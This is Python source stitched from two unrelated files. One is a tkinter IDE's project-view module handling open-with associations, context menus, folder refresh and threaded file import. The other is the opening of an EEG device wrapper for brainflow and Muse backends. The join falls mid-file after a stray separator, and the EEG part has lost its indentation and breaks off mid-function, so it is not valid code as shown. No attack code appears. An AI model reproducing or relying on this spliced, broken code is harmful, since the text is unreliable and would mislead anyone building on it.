            ret = messagebox.askyesno(GetApp().GetAppName(),_("The document \"%s\" is already open,Do you want to close it?") %selected_file_path)
            if ret == True:
                found_view = found_doc.GetFirstView()
                found_view.Close()
                if found_doc in GetApp().GetDocumentManager().GetDocuments():
                    found_doc.Destroy()
                frame = found_view.GetFrame()
                if frame:
                    frame.Destroy()
            else:
                return
        doc = GetApp().GetDocumentManager().CreateTemplateDocument(dlg.selected_template,selected_file_path, core.DOC_SILENT)
        # the user changed the open-with association
        if doc is not None and dlg._is_changed and GetApp().GetDocumentManager().GetDocument(selected_file_path):
            # icon of the chosen template
            template_icon = dlg.selected_template.GetIcon()
            if dlg.Openwith == dlg.OPEN_WITH_PATH:
                utils.profile_set(self.GetView().GetDocument().GetFileKey(item_file,"Open"),dlg.selected_template.GetDocumentName())
                file_template = GetApp().GetDocumentManager().FindTemplateForPath(selected_file_path)
                if file_template != dlg.selected_template:
                    if template_icon is not None:
                        # update this file item's template icon
                        self.GetView()._treeCtrl.item(item,image=template_icon)
            # associate by file name
            elif dlg.Openwith == dlg.OPEN_WITH_NAME:
                filename = os.path.basename(selected_file_path)
                # remember the template for this file name
                utils.profile_set("Open/filenames/%s" % filename,dlg.selected_template.GetDocumentName())
                if template_icon is not None:
                    # bulk-update icons of all items with this file name
                    self.ChangeItemsImageWithFilename(self.GetView()._treeCtrl.GetRootItem(),filename,template_icon)
            # associate by file extension
            elif dlg.Openwith == dlg.OPEN_WITH_EXTENSION:
                extension = strutils.get_file_extension(os.path.basename(selected_file_path))
                # remember the template for this extension
                utils.profile_set("Open/extensions/%s" % extension,dlg.selected_template.GetDocumentName())
                if template_icon is not None:
                    # bulk-update icons of all items with this extension
                    self.ChangeItemsImageWithExtension(self.GetView()._treeCtrl.GetRootItem(),extension,template_icon)
            else:
                assert(False)
def ChangeItemsImageWithFilename(self,parent_item,filename,template_icon):
    '''
    Recursively set *template_icon* on every project file item whose
    display name equals *filename*.
    '''
    if parent_item is None:
        return
    view = self.GetView()
    tree = view._treeCtrl
    for node in tree.get_children(parent_item):
        # update matching file items, then always descend into children
        if view._IsItemFile(node) and tree.item(node,"text") == filename:
            tree.item(node,image=template_icon)
        self.ChangeItemsImageWithFilename(node,filename,template_icon)
def ChangeItemsImageWithExtension(self,parent_item,extension,template_icon):
    '''
    Recursively set *template_icon* on every project file item whose
    file extension equals *extension*.
    '''
    if parent_item is None:
        return
    view = self.GetView()
    tree = view._treeCtrl
    for node in tree.get_children(parent_item):
        # update matching file items, then always descend into children
        if view._IsItemFile(node) and strutils.get_file_extension(tree.item(node,"text")) == extension:
            tree.item(node,image=template_icon)
        self.ChangeItemsImageWithExtension(node,extension,template_icon)
def GetView(self):
    """Return the shared project view."""
    return self._view
def CreateView(self):
    """Create the project view instance shared by all projects."""
    return baseviewer.ProjectView(self)
def SetView(self,view):
    """Install *view* as the shared project view."""
    self._view = view
def AddProject(self,name):
    """Append a project name to the project combobox and return its index.

    tkinter reports an empty `values` option as a str, so a str value means
    the list is empty.
    """
    # idiom fix: isinstance() instead of `type(...) == str`
    if isinstance(self.project_combox['values'], str):
        self.project_combox['values'] = [name]
        return 0
    else:
        self.project_combox['values'] = self.project_combox['values'] + (name,)
        return len(self.project_combox['values']) - 1
def LoadSavedProjects(self):
    """Reopen the project documents persisted in configuration.

    Returns True if at least one project document was opened.  Sets
    self._is_loading for the duration so observers can ignore events.
    """
    self._is_loading = True
    openedDocs = False
    if utils.profile_get_int(consts.PROJECT_DOCS_SAVED_KEY, True):
        docList = utils.profile_get(consts.PROJECT_SAVE_DOCS_KEY,[])
        doc = None
        for fileName in docList:
            # only restore entries that look like project files
            if isinstance(fileName, str) and \
               strutils.get_file_extension(fileName) == consts.PROJECT_SHORT_EXTENSION:
                if utils.is_py2():
                    fileName = fileName.decode("utf-8")
                if os.path.exists(fileName):
                    doc = GetApp().GetDocumentManager().CreateDocument(fileName, core.DOC_SILENT|core.DOC_OPEN_ONCE)
        if doc:
            openedDocs = True
    self._is_loading = False
    return openedDocs
def SetCurrentProject(self):
    """Activate the command-line project, or restore the last saved current project."""
    # if a project was opened from the command line, make it the current one
    open_project_path = GetApp().OpenProjectPath
    if open_project_path is not None:
        self.GetView().SetProject(open_project_path)
    # otherwise restore the current project from stored configuration
    else:
        currProject = utils.profile_get(consts.CURRENT_PROJECT_KEY)
        docList = [document.GetFilename() for document in self.GetView().Documents]
        # activate the stored project only if it is among the open project documents
        if currProject in docList:
            self.GetView().SetProject(currProject)
@property
def IsLoading(self):
    """True while saved projects are being restored at startup."""
    return self._is_loading
def SetFocus(self):
    """Give keyboard focus to the project view and its tree control."""
    self.focus_set()
    self.tree.focus_set()
def ProjectSelect(self,event):
    """Forward project-combobox selection changes to the view."""
    self.GetView().ProjectSelect()
def Show(self,event):
    """Handle the show-view event; load persisted projects on first show."""
    if event.get('view_name') != consts.PROJECT_VIEW_NAME:
        utils.get_logger().info("project view could not handler view %s showview event",event.get('view_name'))
        return
    project = self.GetView().GetDocument()
    # no project open yet -> restore the saved project list
    if not project:
        self.LoadSavedProjects()
def OpenTreeItem(self,event):
    """On node expansion, remember and persist the folder-expansion state."""
    # ignore the event while no project is open
    # (idiom fix: `is None` instead of `== None`)
    if self.GetView().GetDocument() is None:
        return
    self.GetView().SaveFolderState()
def FindProjectFromMapping(self, key):
    """Fast lookup of the project document associated with *key* (None when absent)."""
    return self._mapToProject.get(key)
def AddProjectMapping(self, key, projectDoc=None):
    """Associate a document (or other object) with a project document.

    Falls back to the current project when *projectDoc* is omitted or falsy.
    """
    self._mapToProject[key] = projectDoc if projectDoc else self.GetCurrentProject()
def RemoveProjectMapping(self, key):
    """Remove mapping from model or document to project (no-op when absent)."""
    self._mapToProject.pop(key, None)
def GetCurrentProject(self):
    """Return the document of the project view, or None when there is no view."""
    view = self.GetView()
    return view.GetDocument() if view else None
def FindProjectByFile(self, filename):
    '''Return all project documents containing the file; the current project is first.'''
    retval = []
    for document in GetApp().GetDocumentManager().GetDocuments():
        # only consider documents of the project document type
        if document.GetDocumentTemplate().GetDocumentType() == projectdocument.ProjectDocument:
            if document.GetFilename() == filename:
                retval.append(document)
            # does this project contain the file?
            elif document.IsFileInProject(filename):
                retval.append(document)
    # move the current project to the front of the result
    currProject = self.GetCurrentProject()
    if currProject and currProject in retval:
        retval.remove(currProject)
        retval.insert(0, currProject)
    return retval
def _InitCommands(self):
    """Register all project menu/toolbar commands with the application."""
    GetApp().AddCommand(constants.ID_NEW_PROJECT,_("&Project"),_("New Project"),self.NewProject,image="project/new.png")
    GetApp().AddCommand(constants.ID_OPEN_PROJECT,_("&Project"),_("Open Project"),self.OpenProject,image="project/open.png")
    GetApp().AddCommand(constants.ID_CLOSE_PROJECT,_("&Project"),_("Close Project"),self.CloseProject,tester=lambda:self.GetView().UpdateUI(constants.ID_CLOSE_PROJECT))
    GetApp().AddCommand(constants.ID_SAVE_PROJECT,_("&Project"),_("Save Project"),self.SaveProject,image="project/save.png",tester=lambda:self.GetView().UpdateUI(constants.ID_SAVE_PROJECT))
    GetApp().AddCommand(constants.ID_DELETE_PROJECT,_("&Project"),_("Delete Project"),self.DeleteProject,image="project/trash.png",tester=lambda:self.GetView().UpdateUI(constants.ID_DELETE_PROJECT))
    GetApp().AddCommand(constants.ID_CLEAN_PROJECT,_("&Project"),_("Clean Project"),self.CleanProject,tester=lambda:self.GetView().UpdateUI(constants.ID_CLEAN_PROJECT))
    GetApp().AddCommand(constants.ID_ARCHIVE_PROJECT,_("&Project"),_("Archive Project"),self.ArchiveProject,image="project/archive.png",add_separator=True,tester=lambda:self.GetView().UpdateUI(constants.ID_ARCHIVE_PROJECT))
    GetApp().AddCommand(constants.ID_IMPORT_FILES,_("&Project"),_("Import Files..."),image=GetApp().GetImage("project/import.png"),tester=lambda:self.GetView().UpdateUI(constants.ID_IMPORT_FILES),handler=lambda:self.ProcessEvent(constants.ID_IMPORT_FILES))
    GetApp().AddCommand(constants.ID_ADD_FILES_TO_PROJECT,_("&Project"),_("Add &Files to Project..."),handler=lambda:self.ProcessEvent(constants.ID_ADD_FILES_TO_PROJECT),tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_FILES_TO_PROJECT))
    GetApp().AddCommand(constants.ID_ADD_DIR_FILES_TO_PROJECT,_("&Project"),_("Add Directory Files to Project..."),handler=lambda:self.ProcessEvent(constants.ID_ADD_DIR_FILES_TO_PROJECT),tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_DIR_FILES_TO_PROJECT))
    GetApp().AddCommand(constants.ID_ADD_CURRENT_FILE_TO_PROJECT,_("&Project"),_("&Add Active File to Project..."),handler=lambda:self.ProcessEvent(constants.ID_ADD_CURRENT_FILE_TO_PROJECT),add_separator=True,tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_CURRENT_FILE_TO_PROJECT))
    GetApp().AddCommand(constants.ID_ADD_NEW_FILE,_("&Project"),_("New File"),image=GetApp().GetImage("project/new_file.png"),handler=lambda:self.ProcessEvent(constants.ID_ADD_NEW_FILE),tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_NEW_FILE))
    GetApp().AddCommand(constants.ID_ADD_FOLDER,_("&Project"),_("New Folder"),image=GetApp().GetImage("project/folder.png"),handler=lambda:self.ProcessEvent(constants.ID_ADD_FOLDER),add_separator=True,tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_FOLDER))
    GetApp().AddCommand(constants.ID_PROPERTIES,_("&Project"),_("Project Properties"),self.OnProjectProperties,image=GetApp().GetImage("project/properties.png"),tester=lambda:self.GetView().UpdateUI(constants.ID_PROPERTIES))
    GetApp().AddCommand(constants.ID_OPEN_FOLDER_PATH,_("&Project"),_("Open Project Path in Explorer"),handler=self.OpenProjectPath,tester=lambda:self.GetView().UpdateUI(constants.ID_OPEN_FOLDER_PATH))
@utils.call_after_with_arg(1)
def NewProject(self):
    '''
    Create a new project document from the project template.
    '''
    template = GetApp().GetDocumentManager().FindTemplateForTestPath(consts.PROJECT_EXTENSION)
    template.CreateDocument("", flags = core.DOC_NEW)
@utils.call_after_with_arg(1)
def OpenProject(self):
    '''
    Prompt for a project file and open it in the project view.
    '''
    template = GetApp().GetDocumentManager().FindTemplateForTestPath(consts.PROJECT_EXTENSION)
    # NOTE: deliberately no initialdir here -- the dialog then remembers the
    # directory used on the previous open
    descrs = [strutils.get_template_filter(template),]
    project_path = filedialog.askopenfilename(
        master=GetApp(),
        filetypes=descrs
    )
    if not project_path:
        return
    project_path = fileutils.opj(project_path)
    self.GetView().OpenProject(project_path)
@misc.update_toolbar
def CloseProject(self):
    """Close the currently active project."""
    self.GetView().CloseProject()
@misc.update_toolbar
def SaveProject(self):
    """Save the currently active project."""
    self.GetView().SaveProject()
@misc.update_toolbar
def DeleteProject(self):
    """Delete the currently active project."""
    self.GetView().DeleteProject()
def ArchiveProject(self):
    """Archive the currently active project."""
    self.GetView().ArchiveProject()
def CleanProject(self):
    """Clean the currently active project."""
    self.GetView().CleanProject()
def GetFilesFromCurrentProject(self):
    """Return the file list of the current project, or None when no view or project exists."""
    view = self.GetView()
    if not view:
        return None
    project = view.GetDocument()
    return project.GetFiles() if project else None
def on_secondary_click(self, event):
    """Show the context menu matching the clicked item kind (file / project root / folder)."""
    items = self.tree.selection()
    if not items:
        return
    if self.GetView()._HasFilesSelected():
        menu = self.GetPopupFileMenu(items[0])
    else:
        # items without a parent are the project root
        if not self.tree.parent(items[0]):
            menu = self.GetPopupProjectMenu(items[0])
        else:
            menu = self.GetPopupFolderMenu(items[0])
    menu["postcommand"] = lambda: menu._update_menu()
    menu.tk_popup(event.x_root, event.y_root)
def GetPopupFileMenu(self,item):
    """Build the context menu shown when file items are selected."""
    menu = tkmenu.PopupMenu(self,**misc.get_style_configuration("Menu"))
    menu.Append(constants.ID_OPEN_SELECTION, _("&Open"),handler=lambda:self.ProcessEvent(constants.ID_OPEN_SELECTION))
    menu.Append(constants.ID_OPEN_SELECTION_WITH, _("&Open With..."), handler=lambda:self.ProcessEvent(constants.ID_OPEN_SELECTION_WITH))
    common_item_ids = [None,consts.ID_UNDO,consts.ID_REDO,consts.ID_CUT,consts.ID_COPY,consts.ID_PASTE,consts.ID_CLEAR,None,consts.ID_SELECTALL]
    self.GetCommonItemsMenu(menu,common_item_ids)
    menu.Append(constants.ID_RENAME,_("&Rename"),handler=lambda:self.ProcessEvent(constants.ID_RENAME))
    menu.Append(constants.ID_REMOVE_FROM_PROJECT,_("Remove from Project"),handler=lambda:self.ProcessEvent(constants.ID_REMOVE_FROM_PROJECT))
    # allow plugins to extend the file context menu
    GetApp().event_generate(constants.PROJECTVIEW_POPUP_FILE_MENU_EVT,menu=menu,item=item)
    self.AppendFileFoderCommonMenu(menu)
    return menu
def AppendFileFoderCommonMenu(self,menu):
    """Append entries common to file and folder context menus (properties/explorer/terminal/copy path)."""
    menu.add_separator()
    menu.Append(constants.ID_PROPERTIES,_("&Properties"),handler=lambda:self.ProcessEvent(constants.ID_PROPERTIES))
    menu.Append(constants.ID_OPEN_FOLDER_PATH,_("Open Path in Explorer"),handler=lambda:self.ProcessEvent(constants.ID_OPEN_FOLDER_PATH))
    menu.Append(constants.ID_OPEN_TERMINAL_PATH,_("Open Command Prompt here..."),handler=lambda:self.ProcessEvent(constants.ID_OPEN_TERMINAL_PATH))
    menu.Append(constants.ID_COPY_PATH,_("Copy Full Path"),handler=lambda:self.ProcessEvent(constants.ID_COPY_PATH))
def GetPopupFolderMenu(self,item):
    """Build the context menu shown when a folder item is selected."""
    menu = tkmenu.PopupMenu(self,**misc.get_style_configuration("Menu"))
    menu["postcommand"] = lambda: menu._update_menu()
    common_item_ids = self.GetPopupFolderItemIds()
    self.GetCommonItemsMenu(menu,common_item_ids,is_folder=True)
    menu.Append(constants.ID_RENAME,_("&Rename"),handler=lambda:self.ProcessEvent(constants.ID_RENAME))
    menu.Append(constants.ID_REMOVE_FROM_PROJECT,_("Remove from Project"),handler=lambda:self.ProcessEvent(constants.ID_REMOVE_FROM_PROJECT))
    menu.InsertAfter(constants.ID_ADD_FOLDER,constants.ID_REFRESH_FOLDER,_("&Refresh folder"),handler=lambda:self.ProcessEvent(constants.ID_REFRESH_FOLDER),img=GetApp().GetImage("project/refresh.png"))
    # allow plugins to extend the folder context menu
    GetApp().event_generate(constants.PROJECTVIEW_POPUP_FOLDER_MENU_EVT,menu=menu,item=item)
    self.AppendFileFoderCommonMenu(menu)
    return menu
def GetPopupFolderItemIds(self):
    """Return the ordered command ids of the folder context menu (None = separator)."""
    folder_item_ids = [constants.ID_IMPORT_FILES,constants.ID_ADD_FILES_TO_PROJECT,constants.ID_ADD_DIR_FILES_TO_PROJECT,None,constants.ID_ADD_NEW_FILE,constants.ID_ADD_FOLDER,\
                       None,consts.ID_UNDO,consts.ID_REDO,consts.ID_CUT,consts.ID_COPY,consts.ID_PASTE,consts.ID_CLEAR,None,consts.ID_SELECTALL]
    return folder_item_ids
def GetPopupProjectMenu(self,item):
    """Build the context menu shown when the project root is selected."""
    menu = tkmenu.PopupMenu(self,**misc.get_style_configuration("Menu"))
    menu["postcommand"] = lambda: menu._update_menu()
    common_item_ids = self.GetPopupProjectItemIds()
    self.GetCommonItemsMenu(menu,common_item_ids)
    if self.GetCurrentProject() is not None:
        menu.InsertAfter(constants.ID_ADD_FOLDER,constants.ID_REFRESH_FOLDER,_("&Refresh folder"),img=GetApp().GetImage("project/refresh.png"),handler=lambda:self.ProcessEvent(constants.ID_REFRESH_FOLDER))
        menu.Append(constants.ID_RENAME,_("&Rename"),handler=lambda:self.ProcessEvent(constants.ID_RENAME))
        menu.Append(constants.ID_OPEN_TERMINAL_PATH,_("Open Command Prompt here..."),handler=lambda:self.ProcessEvent(constants.ID_OPEN_TERMINAL_PATH))
        menu.Append(constants.ID_COPY_PATH,_("Copy Full Path"),handler=lambda:self.ProcessEvent(constants.ID_COPY_PATH))
    # allow plugins to extend the project-root context menu
    GetApp().event_generate(constants.PROJECTVIEW_POPUP_ROOT_MENU_EVT,menu=menu,item=item)
    return menu
def GetPopupProjectItemIds(self):
    """Return the ordered command ids of the project-root context menu (None = separator)."""
    project_item_ids = [constants.ID_NEW_PROJECT,constants.ID_OPEN_PROJECT]
    # project-specific commands only make sense while a project is open
    if self.GetCurrentProject() is not None:
        project_item_ids.extend([constants.ID_CLOSE_PROJECT,constants.ID_SAVE_PROJECT, constants.ID_DELETE_PROJECT,\
                                 constants.ID_CLEAN_PROJECT,constants.ID_ARCHIVE_PROJECT])
        project_item_ids.extend([None,constants.ID_IMPORT_FILES,constants.ID_ADD_FILES_TO_PROJECT, \
                                 constants.ID_ADD_DIR_FILES_TO_PROJECT,None,constants.ID_ADD_NEW_FILE,constants.ID_ADD_FOLDER])
        project_item_ids.extend([None, constants.ID_PROPERTIES,constants.ID_OPEN_FOLDER_PATH])
    return project_item_ids
def GetCommonItemsMenu(self,menu,menu_item_ids,is_folder=False):
    """Append the shared menubar items (with context-appropriate enable testers) to a popup menu."""
    for item_id in menu_item_ids:
        if item_id == None:
            menu.add_separator()
            continue
        menu_item = GetApp().Menubar.FindItemById(item_id)
        if menu_item is None:
            continue
        handler = GetApp().Menubar.GetMenuhandler(_("&Project"),item_id)
        extra = {}
        # override the edit-menu tester commands for the popup context
        if item_id in [consts.ID_UNDO,consts.ID_REDO]:
            extra.update(dict(tester=lambda:False))
        elif item_id in [consts.ID_CLEAR,consts.ID_SELECTALL]:
            extra.update(dict(tester=None))
        elif item_id == consts.ID_PASTE:
            extra.update(dict(tester=self.GetView().CanPaste))
        elif item_id in [consts.ID_CUT,consts.ID_COPY]:
            if is_folder:
                extra.update(dict(tester=lambda:False))
            else:
                extra.update(dict(tester=None))
        # no dedicated menubar handler -> route through ProcessEvent
        if handler == None:
            def common_handler(id=item_id):
                self.ProcessEvent(id)
            handler = common_handler
        menu.AppendMenuItem(menu_item,handler=handler,**extra)
def ProcessEvent(self, id):
    """Dispatch a menu/toolbar command id to the matching handler.

    Returns True when the id was handled, False otherwise.
    """
    view = self.GetView()
    if id == constants.ID_ADD_FILES_TO_PROJECT:
        view.OnAddFileToProject()
        return True
    elif id == constants.ID_ADD_DIR_FILES_TO_PROJECT:
        view.OnAddDirToProject()
        return True
    elif id == constants.ID_ADD_CURRENT_FILE_TO_PROJECT:
        view.OnAddCurrentFileToProject()
        return True
    elif id == constants.ID_ADD_NEW_FILE:
        view.OnAddNewFile()
        return True
    elif id == constants.ID_ADD_FOLDER:
        view.OnAddFolder()
        return True
    elif id == constants.ID_RENAME:
        view.OnRename()
        return True
    elif id == constants.ID_CLEAR:
        view.DeleteFromProject()
        return True
    elif id == constants.ID_DELETE_PROJECT:
        # BUG FIX: the original called self.OnDeleteProject(event) where
        # `event` is undefined in this scope (NameError at runtime);
        # delegate to the registered DeleteProject command handler instead.
        self.DeleteProject()
        return True
    elif id == constants.ID_CUT:
        view.OnCut()
        return True
    elif id == constants.ID_COPY:
        view.OnCopy()
        return True
    elif id == constants.ID_PASTE:
        view.OnPaste()
        return True
    elif id == constants.ID_REMOVE_FROM_PROJECT:
        view.RemoveFromProject()
        return True
    elif id == constants.ID_SELECTALL:
        # BUG FIX: the original passed an undefined `event` (NameError);
        # pass None as there is no originating tk event here.
        self.OnSelectAll(None)
        return True
    elif id == constants.ID_OPEN_SELECTION:
        self.OpenSelection()
        return True
    elif id == constants.ID_OPEN_SELECTION_WITH:
        self.OpenSelectionWith()
        return True
    elif id == constants.ID_PROPERTIES:
        self.OnProperties()
        return True
    elif id == constants.ID_IMPORT_FILES:
        view.ImportFilesToProject()
        return True
    elif id == constants.ID_OPEN_FOLDER_PATH:
        self.OpenFolderPath()
        return True
    elif id == constants.ID_OPEN_TERMINAL_PATH:
        self.OpenPromptPath()
        return True
    elif id == constants.ID_COPY_PATH:
        self.CopyPath()
        return True
    elif id == constants.ID_REFRESH_FOLDER:
        self.Refresh()
        # BUG FIX: this branch fell through without a return value, so a
        # handled command reported as unhandled (None); return True like
        # every other handled branch.
        return True
    else:
        return False
def Refresh(self):
    """Re-scan the selected folder for files added or removed on disk."""
    item = self.tree.GetSingleSelectItem()
    filePath = self.GetItemPath(item)
    self.RefreshPath(filePath)
def RefreshPath(self,path):
    '''
    Rescan a folder on disk: add new files (matching self.filters) to the
    project and remove tree nodes whose files no longer exist.
    '''
    add_count = 0
    doc = self.GetCurrentProject()
    item = self.tree.GetSingleSelectItem()
    folderPath = self.GetView()._GetItemFolderPath(item)
    try:
        # scan the directory for files not yet part of the project
        for l in os.listdir(path):
            file_path = os.path.join(path,l)
            if fileutils.is_file_path_hidden(file_path):
                continue
            if os.path.isfile(file_path) and strutils.get_file_extension(l) in self.filters:
                if not doc.GetModel().FindFile(file_path):
                    add_count += 1
                    doc.GetCommandProcessor().Submit(projectcommand.ProjectAddFilesCommand(doc, [file_path], folderPath=folderPath))
            elif os.path.isdir(file_path):
                if folderPath:
                    child_folderPath = folderPath + "/" + l
                else:
                    child_folderPath = l
                folder = self.GetView()._treeCtrl.FindFolder(child_folderPath)
                if not folder:
                    # create a dummy file inside the empty folder so the
                    # empty-folder node does not get pruned
                    doc.GetCommandProcessor().Submit(projectcommand.ProjectAddFolderCommand(self.GetView(), doc, child_folderPath))
                    dummy_file = os.path.join(file_path,consts.DUMMY_NODE_TEXT)
                    doc.GetCommandProcessor().Submit(projectcommand.ProjectAddFilesCommand(doc,[dummy_file],folderPath=folderPath))
    except Exception as e:
        messagebox.showerror(GetApp().GetAppName(),str(e))
        return
    # drop tree nodes whose file or folder no longer exists on disk
    for child in self.GetView()._treeCtrl.get_children(item):
        item_path = self.GetItemPath(child)
        if not os.path.exists(item_path):
            self.GetView()._treeCtrl.delete(child)
            doc.GetCommandProcessor().Submit(projectcommand.ProjectRemoveFilesCommand(doc, [item_path]))
    if 0 == add_count:
        messagebox.showinfo(GetApp().GetAppName(),_("there is not files to add"))
    else:
        messagebox.showinfo(GetApp().GetAppName(),_("total add %d files to project")%add_count)
def OnProperties(self):
    """Show the properties dialog for the selected tree item."""
    projectproperty.PropertiesService().ShowPropertyDialog(self.tree.GetSingleSelectItem())
def OnProjectProperties(self,item_name=None):
    """Show the properties dialog for the project root, optionally preselecting an option page."""
    projectproperty.PropertiesService().ShowPropertyDialog(self.tree.GetRootItem(),option_name=item_name)
def OpenProjectPath(self):
    """Open the directory of the current project file in the system explorer."""
    document = self.GetCurrentProject()
    fileutils.safe_open_file_directory(document.GetFilename())
def OpenFolderPath(self):
    """Open the selected item's path in the system file explorer.

    NOTE: the original computed unused `document`/`project_path` locals;
    GetItemPath() already resolves folder items to absolute paths.
    """
    item = self.tree.GetSingleSelectItem()
    filePath = self.GetItemPath(item)
    fileutils.safe_open_file_directory(filePath)
def OpenPromptPath(self):
    """Open a terminal/command prompt at the selected item's path."""
    item = self.tree.GetSingleSelectItem()
    filePath = self.GetItemPath(item)
    GetApp().OpenTerminator(filename=filePath)
def CopyPath(self):
    """Copy the selected item's full path to the clipboard.

    NOTE: the original fetched the current project document into an unused
    local; removed.
    """
    item = self.tree.GetSingleSelectItem()
    filePath = self.GetItemPath(item)
    utils.CopyToClipboard(filePath)
def GetItemPath(self,item):
    """Return the absolute filesystem path for a tree item (file or folder)."""
    if self.GetView()._IsItemFile(item):
        filePath = self.GetView()._GetItemFilePath(item)
    else:
        # folder items resolve relative to the project file's directory
        document = self.GetCurrentProject()
        project_path = os.path.dirname(document.GetFilename())
        filePath = fileutils.opj(os.path.join(project_path,self.GetView()._GetItemFolderPath(item)))
    return filePath
def StartCopyFilesToProject(self,progress_ui,file_list,src_path,dest_path,que,is_wizard=False):
    """Run CopyFilesToProject on a background thread so the UI stays responsive."""
    self.copy_thread = threading.Thread(target = self.CopyFilesToProject,args=(progress_ui,file_list,src_path,dest_path,que,is_wizard))
    self.copy_thread.start()
def BuildFileList(self,file_list):
    """Return *file_list* unchanged.

    NOTE(review): appears to be an extension hook for subclasses to filter or
    augment the files being copied -- confirm against subclasses.
    """
    return file_list
def CopyFilesToProject(self,progress_ui,file_list,src_path,dest_path,que,is_wizard):
    """Worker-thread body: import files into the project, grouped by source directory."""
    # build a map of directory -> list of files to copy
    utils.get_logger().info('start import total %d files to path %s',len(file_list),dest_path)
    start_time = time.time()
    files_dict = self.BuildFileMaps(file_list)
    copy_file_count = 0
    # copy the files directory by directory
    for dir_path in files_dict:
        self.tree.item(self.tree.GetRootItem(), open=True)
        if progress_ui.is_cancel:
            break
        # all files to copy under this directory
        file_path_list = files_dict[dir_path]
        self.BuildFileList(file_path_list)
        # project-relative path the files are imported under
        folder_path = dir_path.replace(src_path,"").replace(os.sep,"/").lstrip("/").rstrip("/")
        paths = dest_path.split(os.sep)
        # when the destination is nested, prepend the intermediate folders
        if len(paths) > 1:
            # the first component is the project directory and must be dropped
            dest_folder_path = "/".join(paths[1:])
            if folder_path != "":
                dest_folder_path += "/" + folder_path
        else:
            dest_folder_path = folder_path
        self.GetView().GetDocument().GetCommandProcessor().Submit(ProjectAddProgressFilesCommand(progress_ui,\
                self.GetView().GetDocument(), file_path_list, que,folderPath=dest_folder_path,range_value = copy_file_count))
        copy_file_count += len(file_path_list)
    # (None, None) signals the consumer that the import is finished
    que.put((None,None))
    end_time = time.time()
    utils.get_logger().info('success import total %d files,elapse %d seconds',copy_file_count,int(end_time-start_time))
    # after a wizard-driven import, set the startup file
    if is_wizard:
        progress_ui.SetStartupfile()
def BuildFileMaps(self,file_list):
    """Group the given file paths by their containing directory."""
    mapping = {}
    for path in file_list:
        mapping.setdefault(os.path.dirname(path), []).append(path)
    return mapping
def SaveProjectConfig(self):
    """Persist the project configuration via the view."""
    return self.GetView().WriteProjectConfig()
def GetOpenProjects(self):
    """Return all currently open project documents."""
    return self.GetView().Documents
def GetReferenceProjects(self,doc_or_path,ensure_open=False):
    """Return the reference projects of a project document (or project path).

    With ensure_open=False the stored reference file names are returned;
    with ensure_open=True only the currently open matching documents are.
    """
    if isinstance(doc_or_path,str):
        doc = GetApp().GetDocumentManager().GetDocument(doc_or_path)
        if doc is None:
            return []
    else:
        doc = doc_or_path
    ref_project_names = utils.profile_get(doc.GetKey() + "/ReferenceProjects",[])
    if not ensure_open or not ref_project_names:
        return ref_project_names
    ref_docs = []
    for pj_doc in self.GetView().Documents:
        if pj_doc.GetFilename() in ref_project_names:
            ref_docs.append(pj_doc)
    return ref_docs
|
eeg.py | """ Abstraction for the various supported EEG devices.
1. Determine which backend to use for the board.
2.
"""
import os, sys
import time
from time import sleep
from multiprocessing import Process
import numpy as np
import pandas as pd
from brainflow import BoardShim, BoardIds, BrainFlowInputParams
from muselsl import stream, list_muses, record
from pylsl import StreamInfo, StreamOutlet
from eegnb.devices.utils import get_openbci_usb, create_stim_array
# List of device names handled by the brainflow backend.
# NOTE: the original list contained "brainbit" twice; the duplicate is removed
# (membership semantics are unchanged).
brainflow_devices = [
    "ganglion",
    "ganglion_wifi",
    "cyton",
    "cyton_wifi",
    "cyton_daisy",
    "cyton_daisy_wifi",
    "brainbit",
    "unicorn",
    "synthetic",
    "notion1",
    "notion2",
    "freeeeg32",
]
class EEG:
device_name: str
def __init__(
self,
device=None,
serial_port=None,
serial_num=None,
mac_addr=None,
other=None,
ip_addr=None,
):
"""The initialization function takes the name of the EEG device and determines whether or not
the device belongs to the Muse or Brainflow families and initializes the appropriate backend.
Parameters:
device (str): name of eeg device used for reading data.
"""
# determine if board uses brainflow or muselsl backend
self.device_name = device
self.serial_num = serial_num
self.serial_port = serial_port
self.mac_address = mac_addr
self.ip_addr = ip_addr
self.other = other
self.backend = self._get_backend(self.device_name)
self.initialize_backend()
def initialize_backend(self):
if self.backend == "brainflow":
self._init_brainflow()
elif self.backend == "muselsl":
self._init_muselsl()
def _get_backend(self, device_name):
if device_name in brainflow_devices:
return "brainflow"
elif device_name in ["muse2016", "muse2", "museS"]:
return "muselsl"
#####################
# MUSE functions #
#####################
def _init_muselsl(self):
# Currently there's nothing we need to do here. However keeping the
# option open to add things with this init method.
pass
def _start_muse(self, duration):
if sys.platform in ["linux", "linux2", "darwin"]:
# Look for muses
self.muses = list_muses()
# self.muse = muses[0]
# Start streaming process
self.stream_process = Process(
target=stream, args=(self.muses[0]["address"],)
)
self.stream_process.start()
# Create markers stream outlet
self.muse_StreamInfo = StreamInfo(
"Markers", "Markers", 1, 0, "int32", "myuidw43536"
)
self.muse_StreamOutlet = StreamOutlet(self.muse_StreamInfo)
# Start a background process that will stream data from the first available Muse
print("starting background recording process")
print("will save to file: %s" % self.save_fn)
self.recording = Process(target=record, args=(duration, self.save_fn))
self.recording.start()
time.sleep(5)
self.push_sample([99], timestamp=time.time())
def _stop_muse(self):
pass
def _muse_push_sample(self, marker, timestamp):
self.muse_StreamOutlet.push_sample(marker, timestamp)
##########################
# BrainFlow functions #
##########################
def _init_brainflow(self):
"""This function initializes the brainflow backend based on the input device name. It calls
a utility function to determine the appropriate USB port to use based on the current operating system.
Additionally, the system allows for passing a serial number in the case that they want to use either
the BraintBit or the Unicorn EEG devices from the brainflow family.
Parameters:
serial_num (str or int): serial number for either the BrainBit or Unicorn devices.
"""
# Initialize brainflow parameters
self.brainflow_params = BrainFlowInputParams()
if self.device_name == "ganglion":
self.brainflow_id = BoardIds.GANGLION_BOARD.value
if self.serial_port == None:
self.brainflow_params.serial_port = get_openbci_usb()
# set mac address parameter in case
if self.mac_address is None:
print("No MAC address provided, attempting to connect without one")
else:
self.brainflow_params.mac_address = self.mac_address
elif self.device_name == "ganglion_wifi":
self.brainflow_id = BoardIds.GANGLION_WIFI_BOARD.value
if self.ip_addr is not None:
self.brainflow_params.ip_address = self.ip_addr
self.brainflow_params.ip_port = 6677
elif self.device_name == "cyton":
self.brainflow_id = BoardIds.CYTON_BOARD.value
